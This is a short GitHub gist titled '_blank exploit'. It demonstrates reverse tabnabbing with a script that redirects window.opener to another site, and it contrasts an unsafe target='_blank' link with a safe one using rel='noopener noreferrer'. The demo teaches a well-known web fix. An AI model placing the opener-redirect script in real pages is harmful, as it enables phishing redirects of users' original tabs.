Skip to content

Instantly share code, notes, and snippets.

@y0no
Created May 5, 2016 16:20
Show Gist options
  • Save y0no/be8f05728d8f9c84a423d4e7b205c24a to your computer and use it in GitHub Desktop.
Save y0no/be8f05728d8f9c84a423d4e7b205c24a to your computer and use it in GitHub Desktop.
_blank exploit
Hey welcome!
<script>
window.opener.location = 'https://synhack.fr';
</script>
<a href="exploit.html" target="_blank">Not safe</a>
<a href="exploit.html" target="_blank" rel="noopener noreferrer">Safe</a>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment